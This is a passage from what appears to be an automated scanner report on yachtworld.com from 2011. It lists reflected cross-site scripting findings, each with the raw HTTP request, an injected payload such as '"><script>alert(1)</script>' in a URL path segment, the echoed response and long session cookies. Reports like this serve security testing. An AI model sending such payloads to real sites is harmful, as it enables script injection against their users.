TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:26 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type559a7"><a>1435df8bb9e/Regulator/1">
...[SNIP]...

3.269. http://www.yachtworld.com/boats/category/type/Regulator [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Regulator

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46502"><a>d9fa499e979 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Regulator46502"><a>d9fa499e979 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:34 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Regulator46502"><a>d9fa499e979/A-1">
...[SNIP]...

3.270. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Rinker/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a625c"><script>alert(1)</script>2566fb9811d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/typea625c"><script>alert(1)</script>2566fb9811d/Rinker/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:50 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/typea625c"><script>alert(1)</script>2566fb9811d/260+Cruiser">
...[SNIP]...

3.271. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Rinker/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24df"><a>03e5450caba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Rinkerc24df"><a>03e5450caba/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:53 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Rinkerc24df"><a>03e5450caba/A-1">
...[SNIP]...

3.272. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Rinker/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7825"><script>alert(1)</script>80927bb1bef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Rinker/1b7825"><script>alert(1)</script>80927bb1bef HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:02 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Rinker/1b7825"><script>alert(1)</script>80927bb1bef/A-1">
...[SNIP]...

3.273. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Sabre/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21995"><a>b3c7d68a669 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type21995"><a>b3c7d68a669/Sabre/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; 